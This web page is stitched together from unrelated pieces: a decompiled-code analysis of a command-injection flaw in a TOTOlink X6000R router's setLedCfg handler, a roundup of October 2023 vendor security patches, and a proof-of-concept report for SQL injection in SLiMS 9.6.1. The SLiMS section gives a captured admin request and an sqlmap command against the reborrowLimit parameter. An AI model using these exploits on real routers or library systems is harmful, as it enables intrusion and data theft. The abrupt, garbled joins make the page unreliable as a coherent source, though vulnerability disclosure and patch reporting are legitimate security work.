18  
19  
20  
21  
22  
23  
24  
25  
26  
27  
28  
29  
30  
31  
32  
33  
34  
35  
36  
37  
38  
39  
40  
41  
42  
43  
44  
45  
46  
47  
48  
49  
50  
51  
52  
53  
54  
55  

    __int64 __fastcall sub_4117F8(__int64 a1, __int64 a2){  const char *v4; // x22  const char *v5; // x23  int v6; // w0  int v8; // [xsp+44h] [xbp+44h] BYREF  char s[8]; // [xsp+48h] [xbp+48h] BYREF  __int64 v10; // [xsp+50h] [xbp+50h]  __int64 v11; // [xsp+58h] [xbp+58h]  __int64 v12; // [xsp+60h] [xbp+60h]  __int64 v13; // [xsp+68h] [xbp+68h]  __int64 v14; // [xsp+70h] [xbp+70h]  __int64 v15; // [xsp+78h] [xbp+78h]  __int64 v16; // [xsp+80h] [xbp+80h]  __int64 v17[8]; // [xsp+88h] [xbp+88h] BYREF  v4 = (const char *)sub_40BD6C(a1, "lang");  v5 = (const char *)sub_40BD6C(a1, "langAutoFlag");  v8 = 0;  *(_QWORD *)s = 0LL;  v10 = 0LL;  v11 = 0LL;  v12 = 0LL;  v13 = 0LL;  v14 = 0LL;  v15 = 0LL;  v16 = 0LL;  memset(v17, 0, sizeof(v17));  Uci_Set_Str();  Uci_Get_Int(11LL, "main", "lang_auto_flag", &v8);  v6 = atoi(v5);  if ( v6 != v8 )    Uci_Set_Str();  Uci_Commit(11LL);  snprintf(s, 0x40uLL, "helpurl_%s", v4);  Uci_Get_Str(15LL, "custom", s, v17);  if ( LOBYTE(v17[0]) )  {    *(_QWORD *)s = 0LL;    v10 = 0LL;    v11 = 0LL;    v12 = 0LL;    v13 = 0LL;    v14 = 0LL;    v15 = 0LL;    v16 = 0LL;    snprintf(s, 0x40uLL, "http://%s", (const char *)v17);  }  else  {    strcpy(s, "");  }  sub_40BDA0(a2, 1LL, "", 0LL, "0", s);  return 0LL;}

现在来看libcscommon.so

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  

    ABEL_57:  while ( 1 )  {    off_2AB30(v12, 1024LL, "uci -c %s set %s.%s.%s=\"%s\"", v9, v10, a2, a3, a4);    off_2AD78(v12, 0LL);    result = 1LL;LABEL_58:    if ( v13 == *(_QWORD *)off_2A970 )      break;    off_2AC18();LABEL_60:    v9 = "/tmp/cste/";    v10 = "system_status";  }  return result;

The off\_2AD78 of them is LOAD:000000000002AD78 18 60 00 00 00 00 00 00 off\_2AD78 DCQ CsteSystem

That is, system

CVE-2023-46484: TOTOlink X6000R command injetction (setLedCfg)

Plus: Major vulnerability fixes are now available for a number of enterprise giants, including Cisco, VMWare, Citrix, and SAP.

October has been a security flaw-fest, with Apple, Microsoft, and Google issuing patches for vulnerabilities that are being used in real-life attacks. There were also multiple enterprise fixes during the month, with Cisco, VMWare, and Citrix fixing serious security bugs.

Some of the patches are more urgent than others, so read on to find out what you need to know about the updates released in October.

Apple iOS and iPad OS

October was a busy month for Apple, with the iPhone maker issuing its second set of fixes as part of iOS 17.1 at the end of the month. The two dozen security fixes in iOS 17.1 include patches for serious flaws in the Kernel at the heart of the iOS operating system and WebKit, the engine that underpins the Safari browser.

Tracked as CVE-2023-42849, the Kernel issue fixed in iOS 17.1 could allow an attacker that has already achieved code execution to bypass memory mitigations, Apple said on its support page. The three WebKit flaws—tracked as CVE-2023-40447, CVE-2023-41976, and CVE-2023-42852—could lead to arbitrary code execution.

Apple has also issued iOS and iPad OS 16.7.2, fixing the same flaws for users of older devices or those who don’t want to upgrade right away. They came alongside macOS Sonoma 14.1, macOS Ventura 13.6, macOS Monterey 12.7.1, tvOS 17.1, WatchOS 10.1, and Safari 17.1.

Earlier this month, Apple released iOS 17.0.3 and iOS 16.7.1, fixing issues being used in real-life attacks. Tracked as CVE-2023-42824, the first is a Kernel bug that could allow an attacker with access to your device to elevate their privileges.

Apple also fixed CVE-2023-5217, a buffer overflow flaw that could allow an attacker to execute code. Affecting multiple browsers and platforms, the bug has already been patched in Google’s Chrome browser.

Microsoft

Microsoft’s Patch Tuesday has seen the tech giant fix over 100 flaws, including two zero-day vulnerabilities in Microsoft WordPad and Skype for Business.

CVE-2023-36563 is an information disclosure bug in the WordPad word processing program that could expose NTLM hashes and result in NTLM relay attacks. However, it requires user interaction: The attacker must send someone a malicious file and convince them to open it, Microsoft said.

CVE-2023-41763 is an elevation of privilege vulnerability in Skype for Business. “An attacker could make a specially crafted network call to the target Skype for Business server, which could cause the parsing of an http request made to an arbitrary address,” potentially disclosing IP addresses or port numbers, Microsoft said.

Microsoft also patched a flaw in Message Queuing tracked as CVE-2023-35349 with a CVSS critical score of 9.8, which could allow an unauthenticated attacker to remotely execute code.

October’s Patch Tuesday is a particularly urgent one, so it’s important to update as soon as you can.

Google Chrome

Google has released 20 security fixes for its Chrome browser, including one patch for a flaw rated as critical. Tracked as CVE-2023-5218, the bug is a use-after-free issue in Site Isolation. Another six fixes cover inappropriate implementation vulnerabilities marked as having medium impact, while CVE-2023-5476 is a use-after-free flaw in Blink History. Another issue, CVE-2023-5474, is a heap buffer overflow in PDF, according to Google’s blog.

A further four inappropriate implementation vulnerabilities are rated as having a low impact, with Google also fixing a low severity use-after-free bug in Cast tracked as CVE-2023-5473.

None of the flaws fixed in October have been exploited, but given how actively the browser is targeted, it makes sense to update as soon as you can.

Google Android

Google’s October Android update was a major one because it fixed 53 issues, including two vulnerabilities already being used in real-life attacks. The first is CVE-2023-4863, a heap buffer overflow bug in libwebp affecting the applications that use the library to encode and decode images in the WebP format. This vulnerability impacts many applications and could be used to install spyware, security firm Malwarebytes wrote in a blog.

There are indications that the bug “may be under limited, targeted exploitation,” Google said in an advisory.

CVE-2023-4211 is an issue in Arm components rated as having a high impact, which Google said is also being used in attacks. “A local non-privileged user can make improper GPU memory processing operations to gain access to already freed memory,” Malwarebytes said, adding that the vulnerability affects multiple versions of Arm Mali GPU drivers. These are used in multiple Android device models, including those made by Google, Samsung, Huawei, and Xiaomi.

Another scary flaw in the System tracked as CVE-2023-40129 is rated as critical. “The \[vulnerability\] could lead to remote code execution with no additional execution privileges needed,” Google said.

The update is available for Google’s Pixel and Samsung’s Galaxy series, so if you have an Android device, check your settings ASAP.

Cisco

Software giant Cisco has released patches to fix two already exploited flaws. Tracked as CVE-2023-20198 and with an eye-watering CVSS score of 10, the first is an issue in the web user interface feature of Cisco IOS XE software. It affects physical and virtual devices running Cisco IOS XE software that also have the HTTP or HTTPS Server feature enabled, researchers at Cisco Talos said in a blog.

“Successful exploitation of CVE-2023-20198 allows an attacker to gain privilege level 15 access to the device, which the attacker can then use to create a local user and log in with normal user access,” the researchers warned.

The attacker can use the new unauthorized local user account to exploit a second vulnerability, CVE-2023-20273, in another component of the WebUI feature. “This allows the adversary to inject commands with elevated root privileges, giving them the ability to run arbitrary commands on the device,” said Talos Intelligence, Cisco’s cybersecurity firm.

Cisco “strongly recommends that customers disable the HTTP Server feature on all internet-facing systems or restrict its access to trusted source addresses,” the firm wrote in an advisory.

VMWare

VMWare has patched two out-of-bounds write and information disclosure vulnerabilities in its vCenter Server. Tracked as CVE-2023-34048, the first is a vulnerability in the implementation of the DCERPC protocol that could lead to remote code execution. VMware has rated the flaw as critical with a CVSS base score of 9.8.

At the other end of the CVSS scale but still worth mentioning is CVE-2023-34056, a partial information disclosure bug with a score of 4.3. “A malicious actor with non-administrative privileges to vCenter Server may leverage this issue to access unauthorized data,” VMWare wrote in an advisory.

Citrix

Enterprise software firm Citrix has issued urgent fixes for vulnerabilities in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway). Tracked as CVE-2023-4966 and with a CVSS score of 9.4, the first bug could allow an attacker to expose sensitive information.

CVE-2023-4967 is a denial of service issue with a CVSS score of 8.2. Exploits of CVE-2023-4966 on unmitigated appliances “have been observed,” Citrix said. “Cloud Software Group strongly urges customers of NetScaler ADC and NetScaler Gateway to install the relevant updated versions of NetScaler ADC and NetScaler Gateway as soon as possible.”

SAP

SAP’s October Security Patch Day saw the release of seven new security notes, all of which were rated as having a medium impact. Tracked as CVE-2023-42474, the worst flaw is a cross-site scripting vulnerability in SAP BusinessObjects Web Intelligence with a CVSS score of 6.8.

With only nine new and updated security notes, SAP’s October Patch Day “belongs to the calmest of the last five years,” security firm Onapsis said.

While SAP’s October flaw count was much smaller than its peers’, attackers are still out there, so you should still keep up to date and get patching as soon as you can.

Apple, Google, and Microsoft Just Patched Some Spooky Security Flaws

SQL injection vulnerability in Senayan Library Management Systems Slims v.9 and Bulian v.9.6.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via a crafted script to the reborrowLimit parameter in the member_type.php.

**The Bug**

A SQL Injection has found in admin/modules/membership/member_type.php at the code below

    $data['member_type_name'] = $dbs->escape_string($memberTypeName);
    $data['loan_limit'] = trim($_POST['loanLimit']);
    $data['loan_periode'] = trim($_POST['loanPeriode']);
    $data['enable_reserve'] = $_POST['enableReserve'];
    $data['reserve_limit'] = $_POST['reserveLimit'];
    $data['member_periode'] = $_POST['memberPeriode'];
    $data['reborrow_limit'] = $_POST['reborrowLimit'];
    $data['fine_each_day'] = $_POST['fineEachDay'];
    $data['grace_periode'] = $_POST['gracePeriode'];
    $data['input_date'] = date('Y-m-d');
    $data['last_update'] = date('Y-m-d');
    

**To Reproduce**

Steps to reproduce the behavior:

1.  Login as admin or user that has access membership type
    
2.  Make sure the burp application is turned on to capture the request as screenshot below  
    
3.  Save the request in a separate file (sample.reg)  
    sample.reg example
    

    POST /slims9_bulian-9.6.1/admin/modules/membership/member_type.php?itemID=2&detail=true&ajaxload=1& HTTP/1.1
    Host: localhost
    Content-Length: 1420
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQUBKpazqdLdsHspa
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=membership
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: SenayanAdmin=f5581i7ero1b1mitlh328upvmt; admin_logged_in=1; SenayanMember=37qocaml59lu0snk1tt3n74qgn
    Connection: close
    
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="csrf_token"
    
    29ad9eb49edd5718652dff82f33e7ecb4000e5f376eac9d52346c6843c5b9d16
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="form_name"
    
    mainForm
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="memberTypeName"
    
    abcdef
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="loanLimit"
    
    0
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="loanPeriode"
    
    0
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="enableReserve"
    
    1
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="reserveLimit"
    
    0
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="memberPeriode"
    
    1
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="reborrowLimit"
    
    4423
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="fineEachDay"
    
    1
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="gracePeriode"
    
    0
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="saveData"
    
    Update
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="updateRecordID"
    
    2
    ------WebKitFormBoundaryQUBKpazqdLdsHspa--
    
    
    

run the test with the following command:

    sqlmap -r example.req --level 5 --risk 3 -p reborrowLimit --random-agent --dbms=mysql --current-user
    

5.  You've entered into the system  
    

**Screenshots**

**Versions**

*   OS: Windows
*   Browser: Brave Browser | Version 1.57.57 Chromium: 116.0.5845.163 (Official Build) (64-bit)
*   Slims Version: slims9\_bulian-9.6.1

Tag

#webkit